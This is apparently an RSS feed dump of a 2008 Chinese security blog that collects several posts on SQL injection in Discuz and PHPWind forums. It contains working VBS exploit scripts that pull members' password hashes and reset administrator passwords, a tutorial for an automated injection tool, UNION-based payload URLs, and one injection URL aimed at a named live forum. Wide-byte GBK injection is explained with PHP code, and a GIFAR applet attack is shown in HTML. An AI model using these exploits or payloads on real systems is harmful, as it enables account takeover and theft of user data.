http://huaidan.org 关注网络安全 Fri, 08 Aug 2008 17:22:11 +0000 http://backend.userland.com/rss092 en 来源：狼族论坛 打开软件，界面如图1，界面很清晰和整洁。 使用的时候，Mysql5 inj point那个框就是你要注射的url。该url应该是有注射漏洞的点。要连union一起，就像默认值那样 http://127.0.0.1/index.php?id=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5 比如第4个数字会在页面上显示，那么你就将数字4替换成“loveuk”,而且最后不要跟注释符（因为程序会在提交的时候默认会自动加上），最终的url如下： http://127.0.0.1/index.php?id=1/**/and/**/1=2/**/union/**/select/**/1,2,3,loveuk,5 设置好这个点，可以选择注射类型，这里以GET类型为例子做示范。HexEnCode一般不要选上，除非出现编码不匹配的时候才需要，空格默认是用/**/替换的，可以根据具体情况修改。 设置好后点GO,就可以开始注射了，很快数据库里面的所有库就都被列了出来，如图二。下一步操作如图三，选中你要猜解的数据库库名，右击，选择list tables即可。猜解完表名，可以选在你需要的表来猜字段，方法和选择数据库名时一样，右击选择list Fields,如图四、图五。最后一步是读取数据，如图六，将你感兴趣的那个字段其面打上钩即可，右击选择read dates就可以得到你想要的数据了！整个过程中你不必等到每一步都进行完了再进行下一步，如果你感性趣的内容已经出来了，只要单击STOP按钮程序即可停止... ... WSI V5.0.18使用手册(见附件) 附件:WSI使用手册.doc  MD5: D0FFAC1D75130DB7BB25287C620B3A89 附件:WSI v5.0.18.exe   MD5: 94BEEAC3CF60AD055CC8235741FA0D96 下载地址：WSI v5.0.18.rar http://huaidan.org/archives/2233.html 作者：空虚浪子心[XGC] 原文链接 【IT168专稿】引言 因为一个 0day，让作者对java applet心血来潮，随着不断的失败，发现了一个又一个安全特性。本文提醒大家，除了activeX，还有这么一种东西，一旦出现了安全隐患，也会帮大 家做些什么。如果你要找“0DAY”，请掠过;如果你要找“如何使用APPLET下载木马”，请看下集;如果你喜欢研究“applet可能存在的安全隐患 ”，请从这里开始。 第一部分 一个“0day”狂想 最近常听见有朋友说“只有跨站执行脚本才是王道”，但是我想，每一门艺术(技术)，都有自己的独到的美(特性)，就像后门除了使用“特洛伊”，还有可以用很多微小的途径，拼合起来，就可能达到比它更加完美的效果。 论坛上某帖发出一篇通杀FF和IE的0DAY代码：Import java.applet.Applet; //加载applet包 。。。。。。。。。。。。。。。。。。。。。。。省略 public class Client extends Applet //继承applet { public void start() ... http://huaidan.org/archives/2231.html 作者：Safe3 原文链接 本打算考虑写个python版的，考虑大家的机器环境还是弄了个vbs版 也利于修改 以下是search.inc.php 文件漏洞利用代码VBS版 Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "POST",strSite & strPath & "index.php", False objXML.SetRequestHeader "Accept", "*/*" objXML.SetRequestHeader "Accept-Language", "zh-cn" objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXML.SetRequestHeader "User-Agent", "wap" objXML.send(strUrl) wscript.echo(objXML.ResponseText) Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit discuz6.0.1") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site path uid") .Echo("例子:") .Echo(" cscript "&.ScriptName&" ... http://huaidan.org/archives/2230.html 作者：5up3rh3i 原文链接 这几天领导为了抢病人把我们120急救中心搬到院外,本来偷偷在院长办公室接来的网线现在也用不上了.到外面了就没办法上网了...没想到dz vs pw的进一步升级. .最开始pw的'冰封浪子'在他的blog上发了一个dz sql注射的隐藏日志,结果被ring04h黑了,结果传来传去到处都是... dz的'剑心'看到并且证实了该漏洞..于是'冰封浪子' 就公布了他的exp,但是很奇怪的是Phpwind也存在类似的漏洞[虽然Phpwind6补丁了,但是以前的版本并没有补丁],于是被'剑心'抓到了.......... 现在时间回到几年前,dz的'小戴'还是很有眼光的,'剑心'和'9xiao'黑了dz后,然后把'剑心'引进了dz,并且负责dz的安全,这样dz就偷偷的补丁了很多bug :) 并且安全部门 得到发展,同时他们利用'业余时间',发布了很多Phpwind的漏洞... Phpwind在安全上一直处于下风,到了phpwind6把代码结构重新整理,并且加强了安全性,到了今年才引进专门的安全人员[一切都是被逼的~~~~~~~~~被逼的] 感叹下,杂看别人的代码都那么厉害呢? :) 最后我们来具体说说这个漏洞的一些细节[Thx Ryat] 具体原理还是宽字节编码之间转换导致的安全问题. 这里看个代码: <?php //gpc=on $id1=mb_convert_encoding($_GET['a'], 'utf-8', 'gbk'); $id2=iconv('gbk//IGNORE', 'utf-8', $_GET['a']); $id3=iconv('gbk', 'utf-8', $_GET['a']); print "select * from test where id='$id1'"; print "select * from test where id='$id2'"; print "select * from test where id='$id3'"; ?> 提交a=%bf%27 然后查看原代码可以看到: select * from test where id='縗'' select * from test where id='縗'' select * from test where id='縗'' 以上gbk转utf-8导致安全问题,但是dz不完全是这样. \wap\index.php里 if($_POST ... http://huaidan.org/archives/2229.html 作者：axis 原文链接 思路有点乱，想到什么说什么吧。 这个漏洞的危害主要在于跨域的影响上。普通的XSS漏洞可能需要在target site上找一个XSS的漏洞，然后诱使受害者去访问存在XSS的页面或者是点击一个XSS的link。 但是这类跨域漏洞不同，他不需要在target site上做什么，而是只需要在任意一个第三方站点上构造一些恶意脚本就可以实施攻击了，攻击范围将扩大许多许多。当然这个漏洞有点特殊，我们稍后再讲细节。 其次就是老外在文章里说的，java只是这种利用方式的一种，这种捆绑文件的方式还有很多利用途径。其实这里主要说的就是如果在服务端没有做好过滤，这种捆绑文件能够被某些客户端程序强行解析的话，就会存在一个利用。 就这个漏洞来说，就是jvm会去强行解析jar，不管那个文件头是不是jar，也不管后缀，只要后面有jar文件头，就会去解析他。 其次，这个漏洞之所以成为漏洞，其核心处就在于applet里发起的请求是用的stored cookie，而不是session cookie。 (详见John Heasman的原文) 这点才是这个漏洞最核心的地方。因为对于CSRF而言，使用的是session cookie，所以攻击者实施攻击的时候可能还需要诱骗用户打开个页面，以保证浏览器中存在target site的session cookie，才能CSRF成功。 而stored cookie是存在本地的，就算浏览器中没有session cookie，都能成功实施GIFAR攻击，而applet发起的socket，可以针对target site做更多事情，比如发起其他协议的请求。所以pdp才会说这个漏洞之所以危险，是在于它打破了浏览器的安全模型。 如果SUN要修补的话，肯定也是在这里进行修补，即把发起的http请求变成使用session cookie。 但是经过我这两天的测试，发现这个漏洞还是有一定的局限性的。因为我发现可以取到http response的头和cookie，但是取不到http request的头和cookie。 就是说前面提到的这个applet发起的请求里，会自动使用的stored cookie从applet里是读不出来的。也许是我土吧，但没找到方法。 下面看一下测试过程： 首先构造html页面 <img src="http://hiphotos.baidu.com/aullik5/pic/item/5a3258b4d970e0d836d3cadf.jpg" /> <applet code="cn.isto.XSSJApplet" width="1000" height="200" codebase="http://hiphotos.baidu.com/aullik5/pic/item/" archive="b2cdb444ab1a4631cffca3b2.jpg" name="xss"> <PARAM NAME="url" VALUE="http://hiphotos.baidu.com/aullik5/pic/item/5a3258b4d970e0d836d3cadf.jpg"> <PARAM NAME="cookie" VALUE="testcookie"> <PARAM NAME="add" VALUE="fvckfvckfvck"> </applet> <applet code="cn.isto.XSSJApplet" width="1000" height="200" codebase="http://www.cnitblog.com/images/cnitblog_com/axis/" archive="00.JPG" name="xss"> <PARAM NAME="url" VALUE="http://www.cnitblog.com/axis/admin/"> </applet> 其中baidu里的 b2cdb444ab1a4631cffca3b2.jpg 和 cnitblog里的 00.JPG 都是我事先捆绑好的文件，applet会把他们当作jar来执行 jar包里的核心代码如下：（感谢kj的编码） /** Initializes the applet XSSJApplet */ public void ... http://huaidan.org/archives/2228.html 来源：凋凌玫瑰's blog 最近出来的php第三方编码转换类漏洞又要死一大批php站了。 先是phpwind接着又是discuz论坛 编码转换没处理的都会存在这类漏洞了 phpwind的大家都知道了，今天群里还有人不知道discuz的。 顺便在群里看到个discuz论坛的站，发出来就都知道咋注了。 http://bbs.hefei.cc/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/* 我个人还是比较反对四处黑站的。 http://huaidan.org/archives/2227.html 文章作者：冰封浪子 信息来源：邪恶八进制信息安全团队（www.eviloctal.com） 漏洞说明：Discuz 论坛系统 是一套采用php+mysql数据库方式运行,在其中发现了一个安全漏洞，成功利用此漏洞可以提取管理员的密码进入后台，取得管理员权限。 漏洞厂商：http://www.discuz.net 漏洞解析：在Discuz的wap模块中的字符转码程序存在问题，在discuz的wap模块中，该编码转换类存在严重的问题。在Discuz中，wap是默认开启的，很容易被攻击者利用，这个问题存在与discuz所有版本中。 在discuz代码中存在多处可利用的地方，如:pm.inc.php/search.inc.php等，下面给出可疑代码片段： pm.inc.php： $floodctrl = $floodctrl * 2; if($floodctrl && !$disablepostctrl && $timestamp - $lastpost < $floodctrl) { wapmsg(’pm_flood_ctrl’); } if($formhash != formhash()) { wapmsg(’wap_submit_invalid’); } $member = $db->fetch_first(”SELECT m.uid AS msgtoid, mf.ignorepm FROM {$tablepre}members m LEFT JOIN {$tablepre}memberfields mf USING (uid) WHERE username=’$msgto’”); if(!$member) { wapmsg(’pm_send_nonexistence’); } if(preg_match(”/(^{ALL}$|(,|^)\s*”.preg_quote($discuz_user, ‘/’).”\s*(,|$))/i”, $member['ignorepm'])) { wapmsg(’pm_send_ignore’); } if(empty($subject) || empty($message)) { wapmsg(’pm_sm_isnull’); } search.inc.php: if(isset($searchid)) { $page = max(1, intval($page)); $start_limit = $number = ($page - ... http://huaidan.org/archives/2226.html 作者：Tr4c3 'phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3 Dim strUrl, strPost, xPost, strGet Set Args = Wscript.Arguments If Args.count<>2 Then Wscript.Echo "Usage: " & Wscript.ScriptName & " http://hi.baidu.com/tr4c3/ 1" Wscript.Quit Else strUrl = Args(0) & "wap/index.php" strPost = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "& Args(1) &",mid(md5(666666),9,16),3,1,5/*&pwpwd=666666" Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.open "POST", strUrl, False xPost.SetRequestHeader "Referer", strUrl xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" xPost.send(strPost) strGet = xPost.ResponseText If InStr(strGet,"登录成功")<>0 Then Wscript.Echo("执行成功") Else Wscript.Echo("执行失败") End If End If 题外话: 某些人要清楚看别人的文章不一定要懂别人写exp的语言，理解了原理，用自己懂的语言搞个exp是很容易的，别动不动就觉得别人搞笑。乱改别人文章是不好的。 漏洞信息：http://www.80sec.com/phpwind-admin-pass-change-vul.html 相关阅读：http://hi.baidu.com/biweilun/blog/item/21c0cf1781585b0fc93d6dd7.html http://huaidan.org/archives/2225.html 作者：ah 来源：Ph4nt0m 需要.net环境 下载地址：PhpwindWapExp.rar http://huaidan.org/archives/2224.html 来源：Trajon.BWL's HI 国内的python风气很不好啊~~   发现很多python的论坛都人气凋零 今天编程编到手软，在网上瞎逛悠，无意中看到80sec放出的一个什么 PHPWind <=5.3的wap模块存在漏洞，可以随意修改用户名密码的Exploit。本来这篇文章不太想写，但是实在是忍不住要跳出来，作为一个python的入门者。 http://www.80sec.com/phpwind-admin-pass-change-vul.html 据80sec的人分析出来的漏洞，wap_mod.php中的wap_login函数有问题，只不过对$men_pwd这个变量进行了长度检测，等于16就截取$password变量的8位字符，然后后面是过滤不严造成了准cookie注入漏洞。 他们下面很拽的给出了一份py的Exploit，现在人家喜欢耍帅，开始用py写Exploit了，很不错的。前两天去我爱python的论坛还发现人气凋零，不禁要慨叹国内的python形势。发现网上很多人转载80Sec的这篇文章，我想问一声，转载的朋友们，你们真的看懂了吗？！！ 我想说，80sec的文章不是圣经~ 感到很搞笑，他们给出的Exploit利用代码(py版)错误百出，可大家都是看都不看，一看到这么多代码头都晕了，然后就马上转载转载再转载，然后这篇“Exploit”就在网上流传开来了，被大家捧为圣经，互相“传诵”~~   转载的朋友，你们真的试过这个代码的可用性了吗？！悲哀~~~ 更有甚者，连这段py代码的编译平台都不知道，就说靠这个错误的Exploit代码拿下了很多网站，是在是太滑稽了 我在这里并不是讽刺80sec，毕竟是国内出名的安全团队。他们的Exploit代码是故意写错的，就像世界著名的milw0rm一样，他们提供的 C++ Exploit代码直接下载下来都是不能直接编译的，作者都会故意写错一些，防止被人家恶意破坏，真正的程序员就能看懂代码，修改出错误的地方。 我想发发牢骚的是针对目前网上流行的这种转载风气，仅此而已 http://huaidan.org/archives/2223.html